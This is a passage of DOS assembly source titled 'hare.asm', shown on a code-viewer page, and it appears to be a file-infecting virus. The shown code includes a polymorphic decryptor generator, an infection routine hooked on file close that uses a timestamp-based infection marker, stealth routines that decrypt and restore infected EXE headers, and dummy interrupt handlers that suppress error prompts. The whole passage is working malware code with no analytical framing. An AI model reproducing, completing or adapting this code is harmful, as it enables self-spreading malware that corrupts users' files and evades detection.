📄 hare.asm
字号:
MOV AH, 40h
CALL Traced_i21h
POP AX
RETN
DATA_77 DW 0E6Ah
Host_Entrypoint DW 0
DATA_79 DB 0BFh
DATA_80 DW 9
DATA_81 DB 0B6h
DATA_82 DB 78h
Used_Mov_Ptr DB 0BBh
DATA_84 DW 0
Used_Push_Ptr DB 57h
Shit9 DB 2Eh
Shit2 DB 0
Shit1 DB 35h
Used_Ptr DB 4Fh
Shit8 DB 4Bh
Shit6 DB 77h
DB 0F9h, 0C3h
SUB_39:
PUSH BX
CALL Get_Ran_3
MOV AH, Mov_Ptr[BX]
MOV Used_Mov_Ptr, AH
MOV AH, Push_Ptr[BX]
MOV Used_Push_Ptr, AH
CALL Get_Random_Poly
MOV DATA_93, AH
CMP AH, 128 ; 50% chance.
JA LOC_145
MOV AH, Dec_Ptr[BX]
JMP LOC_146
LOC_145:
MOV AH, Inc_Ptr[BX]
LOC_146:
MOV Used_Ptr, AH
MOV DL, BL
ADD BL, 3
CMP BL, 3
JNE LOC_147
SUB BL, 2
LOC_147:
MOV DATA_94,BL
LOC_148:
CALL Get_Random_Poly
NOT AX
AND AL, 07h
MOV BL, AL
SHR AL, 01h
CMP DATA_94, AL
JE LOC_148
MOV DATA_95, AL
MOV AH, DATA_110[BX]
MOV DATA_81, AH
SHL DL, 03h
ADD BL, DL
MOV AH, DATA_111[BX]
MOV Shit1, AH
LOC_149:
CALL Get_Random_Poly
NOT AX
MOV BL, AL
AND BL, 07h
CMP BL, 6
JA LOC_149
CMP DATA_94, BL
JE LOC_149
CMP DATA_95, BL
JE LOC_149
MOV DATA_96, BL
MOV AH, [BX+MOV_Reg]
MOV DATA_79, AH
MOV AH, OFFSET [BX+DEC_Reg]
MOV Shit8, AH
CALL Get_Random_Poly
AND AL, 00000111b ; 0 - 7.
CBW
MOV BX, AX
MOV AH, [Cond_Jumps+BX]
MOV Shit6, AH
MOV DATA_97, BL
CALL Get_Random_Poly
NOT AX
XOR BX, BX
MOV BL, AL
AND BL, 00000011b ; 0 - 3.
MOV AL, Host_Type
OR AL, AL ; .COM-file?
JZ LOC_150
MOV BL, AL
LOC_150:
MOV AH, Overrides[BX]
MOV Shit9, AH
MOV AL, DATA_93
AND AL, 00000111b ; 0 - 7.
CBW
INC AX ; 1 - 8.
ADD AX, OFFSET Buffer
MOV DATA_80, AX
POP BX
RETN
DATA_92 DB 0
DATA_93 DB 38H
DATA_94 DB 5DH
DATA_95 DB 3
DATA_96 DB 1
DATA_97 DB 4
DATA_98 DW 0EC8BH
DB 54H, 5DH
DATA_99 DB 7EH, 76H, 6EH, 66H, 46h
;;
DATA_100 DB 64h, 65h, 67h, 9Bh, 0D6h, 9Bh, 64h, 65h
DATA_101 DW 0F0C0H
DB 0C1H,0F0H,0F6H,0C8H,0F7H,0C8H
DB 0D0H,0F0H,0D1H,0F0H
; MOV BX DI SI
Mov_Ptr DB 0BBh, 0BFh, 0BEh
; ---> PUSH BX DI SI
Push_Ptr DB 053h, 057h, 056h
; ---> INC BX DI SI
Inc_Ptr DB 043h, 047h, 046h
; ---> DEC BX DI SI
Dec_Ptr DB 4Bh, 4Fh, 4Eh
; ---> MOV AX, BX, CX, DX, DI, SI, BP.
MOV_Reg DB 0B8h, 0BBh, 0B9h, 0BAh, 0BFh, 0BEh, 0BDh
DEC_Reg:
DEC AX
DEC BX
DEC CX
DEC DX
DEC DI
DEC SI
DEC BP
; ---> JMP
Uncon_Jumps DB 0E8h, 0EBh, 0E9h, 0EAh, 0EFh, 0EEh, 0EDh ; JMPs.
DATA_109 DB 0C0H, 0C3H,0C1H,0C2H,0C7H,0C6H,0C5H
; ---> MOV AL AH BL BH CL CH DL DH
DATA_110 DB 0B0h, 0B4h, 0B3h, 0B7h, 0B1h, 0B5h, 0B2h, 0B6h
DATA_111 DB 7
DB 27H, 00H, 00H, 0FH, 2FH, 17H
DB 37H, 05H, 25H, 1DH, 3DH, 0DH
DB 2DH, 15H, 35H, 04H, 24H, 1CH
DB 3CH, 0CH, 2CH, 14H, 34H
; JNZ JNS JG JGE JA JNB JB JBE
Cond_Jumps DB 75h, 79h, 7Fh, 7Dh, 77h, 73h, 72h, 76h
; DS: CS: ES: SS:
Overrides DB 3Eh, 2Eh, 26h, 36h ; Segment overrides.
Encr_Methods DB 30h, 00h, 28h, 30h ; encr.
DATA_115 DB 0C0h, 0C4h, 0C3h, 0C7h, 0C1h, 0C5h, 0C2h, 0C6h
DATA_116 DB 0E8h, 0ECh, 0EBh, 0EFh, 0E9h, 0EDh, 0EAh, 0EEh
DATA_117 DB 75h, 78h, 7Ch, 7Eh
DATA_118 DW 1F16h, 1F50h, 0D88Eh, 0716h
DB 50H, 07H, 8EH, 0C0h
DATA_119 DB 0C0h, 0C9H, 0D2H, 0DBh
Int24h DW 4CBh, 512h
DATA_122 DW 6EEh
DATA_123 DW 70h
; Dummy critical-error handler.
NewInt24h:
MOV AL, 03h
Do_IRET: IRET
Clean_File:
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH DS
PUSH DI
PUSH SI
CALL Set_Dummy_Handlers
CALL Save_FileAttr
MOV AX, 3D02h ; Open file r/w.
CALL Traced_i21h
JC LOC_155
PUSH AX
CALL Check_FileName
ADD BX, 04h
MOV CX, BX
POP BX
CMP CX, 0Eh
JE LOC_154
PUSH CS
POP DS
CLD
MOV DI, OFFSET FileName1
MOV SI, OFFSET FileName2
REPE CMPSB ; Rep zf=1+cx >0 Cmp [si] to es:[di]
JCXZ LOC_151 ; Jump if cx=0
JMP LOC_154
LOC_151:
MOV CX, 28 ; Read header.
MOV DX, OFFSET Buffer
MOV AH, 3Fh
CALL Traced_i21h
JC LOC_154
CALL Save_FileTime
MOV AX, Trace_Int
AND AL, 00011111b ; Clear all but seconds.
CMP AL, 00010001b ; Infected stamp?
JNE LOC_153
MOV AX, Marker
CMP AX, 'ZM' ; True .EXE?
JE Do_Clean_EXE
CMP AX, 'MZ'
JNE LOC_153
Do_Clean_EXE:
CALL SUB_41
JC LOC_154
LOC_153:
CALL Restore_FileTime
LOC_154:
MOV AH, 3Eh ; Close file.
CALL Traced_i21h
LOC_155:
CALL Restore_FileAttr
CALL Restore_Dummy_Handlers
POP SI
POP DI
POP DS
POP ES
POP DX
POP CX
POP BX
POP AX
RETN
SUB_41:
MOV AX, Init_CS ; Size CS in bytes.
MOV DX, 16
MUL DX
ADD AX, Init_IP ; Plus IP.
ADC DX, 0
MOV CX, Header_Size ; Calculate headersize.
SHL CX, 04h ; MUL 16.
ADD AX, CX ; Plus headersize.
ADC DX, 0
MOV CX, DX ; Go to entrypoint of host.
MOV DX, AX
MOV AX, 4200h
CALL Traced_i21h
JNC No_Err_2
RETN
No_Err_2:
SUB AX, Virus_Size
SBB DX, 0
PUSH AX
PUSH DX
MOV AH, 3Fh
MOV CX, 128
MOV DX, OFFSET Ruck
CALL Traced_i21h
JNC LOC_157
CMP AX, 36
JA LOC_157
ADD SP, 04h
STC
RETN
LOC_157:
PUSH BX
MOV DI, AX
ADD DI, DX
MOV CX, 50
STD
MOV AL, '.'
REPNE SCASB
OR CX, CX
JNZ LOC_158
POP BX
ADD SP, 04h
STC
RETN
LOC_158:
MOV AH, [DI+2]
XOR BX, BX
LOC_159:
CMP Encr_Methods[BX], AH
JE LOC_161
INC BX
CMP BX, 04h
JA LOC_160
JMP LOC_159
LOC_160:
POP BX
ADD SP, 04h
STC
RETN
LOC_161:
MOV AL,[DI+3]
XOR BX, BX
LOC_162:
CMP AL, DATA_111[BX]
JE LOC_164
INC BX
CMP BX, 19h
JA LOC_163
JMP LOC_162
LOC_163:
POP BX
ADD SP, 04h
STC
RETN
LOC_164:
AND BL, 07h
MOV AL, DATA_110[BX]
MOV CX, 50
REPNE SCASB ; Rep zf=0+cx >0 Scan es:[di] for al
OR CX, CX
JNZ LOC_165
POP BX
ADD SP, 04h
STC
RETN
LOC_165:
MOV AL, [DI+2]
CLD
POP BX
POP CX
POP DX
PUSH DX
PUSH CX
PUSH AX
MOV AX, 4200h
ADD DX, OFFSET Old_Entry
ADC CX, 0
CALL Traced_i21h
MOV CX, 15
MOV DX, OFFSET Ruck
MOV AH, 3Fh ; Read
CALL Traced_i21h
POP AX
MOV byte ptr Crp_1, AH
JMP $+2 ; delay for I/O
MOV DI, DX
MOV CX, 15
LOCLOOP_166:
Crp_1:
ADD [DI],AL
NOT BYTE PTR [DI]
INC DI
LOOP LOCLOOP_166
MOV DI,DX
MOV AX,[DI]
MOV Init_IP, AX
MOV AX, [DI+2]
MOV Init_CS, AX
MOV AX, [DI+4]
MOV Init_SP, AX
MOV AX, [DI+6]
MOV Init_SS, AX
MOV AX, [DI+8]
MOV File_Mod512, AX
MOV AX, [DI+0AH]
MOV Byte_Pages, AX
MOV AX, [DI+0CH]
MOV Trace_Int, AX
MOV AL, [DI+0EH]
CMP AL, 01h
JE LOC_167
ADD SP,4
STC
RETN
LOC_167:
POP CX
POP DX
PUSH DX
PUSH CX
AND DX, 1FFh
CMP File_Mod512, DX
JE LOC_168
ADD SP, 04h
STC
RETN
LOC_168:
XOR CX, CX ; Go to start of file.
MOV DX, CX
MOV AX, 4200h
CALL Traced_i21h
MOV DX, OFFSET Buffer ; Read header.
MOV CX, 28
MOV AH, 40h
CALL Traced_i21h
POP CX ; Go to start of file.
POP DX
MOV AX, 4200h
CALL Traced_i21h
MOV AH, 40h ; Write <EOF> marker.
XOR CX, CX
CALL Traced_i21h
RETN
Set_Dummy_Handlers:
PUSH ES
XOR AX, AX
MOV ES, AX
MOV AX, ES:[24h * 4] ; Save INT 24h.
MOV CS:Int24h, AX ; (Critical error-handler).
MOV AX, ES:[24h * 4 + 2]
MOV CS:Int24h+2, AX
MOV AX, ES:[1Bh * 4] ; Save INT 1Bh.
MOV CS:DATA_122, AX ; (Ctrl-Break handler).
MOV AX, ES:[1Bh * 4 + 2]
MOV CS:DATA_123, AX
MOV ES:[24h * 4 + 2], CS ; Dummy error-handler.
MOV ES:[24h * 4], OFFSET NewInt24h
MOV ES:[1Bh * 4 + 2], CS ; Dummy Ctrl-Break handler.
MOV ES:[1Bh * 4], OFFSET Do_IRET
POP ES
RETN
Restore_Dummy_Handlers:
PUSH DS
PUSH ES
PUSH SI
XOR AX, AX
CLD
PUSH CS
POP DS
MOV ES, AX
MOV SI, OFFSET Int24h ; Restore original INT 24h.
MOV DI, 24h * 4
MOVSW
MOVSW
MOV DI, 1Bh * 4 ; Restore original INT 1Bh.
MOVSW
MOVSW
POP SI
POP ES
POP DS
RETN
Make_Random_Stack:
CALL Get_Random_Poly
AND AX, 00000011b ; Mask between 0 - 3.
JZ Make_Random_Stack
ADD AX, Init_CS ; Variable stacksegment.
MOV Init_SS, AX
CALL Get_Random_Poly
AND AX, 00000111b ; 0 - 7.
ADD AX, (Virus_Size + 272)
AND AL, 11111110b
MOV Init_SP, AX
RETN
Infect_Close:
PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH DS
PUSH DI
PUSH SI
PUSHF
PUSH AX
CALL Set_Dummy_Handlers
TEST CS:Flags, 00000001b
JNZ LOC_172
CALL Save_FileTime
MOV AX, CS:Trace_Int
AND AL, 00011111b ; Mask seconds.
CMP AL, 00010001b ; Infected stamp?
JE LOC_172
CALL Get_FileName
JC LOC_172
XOR CX, CX ; Go to begin file.
MOV DX, CX
MOV AX, 4200h
CALL Traced_i21h
JC LOC_172
MOV AH, 3Fh ; Read header.
MOV CX, 28
PUSH CS
POP DS
PUSH DS
POP ES
MOV DX, OFFSET Buffer
CALL Traced_i21h
JC LOC_172
CMP AX, CX ; Bytes read not equal?
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -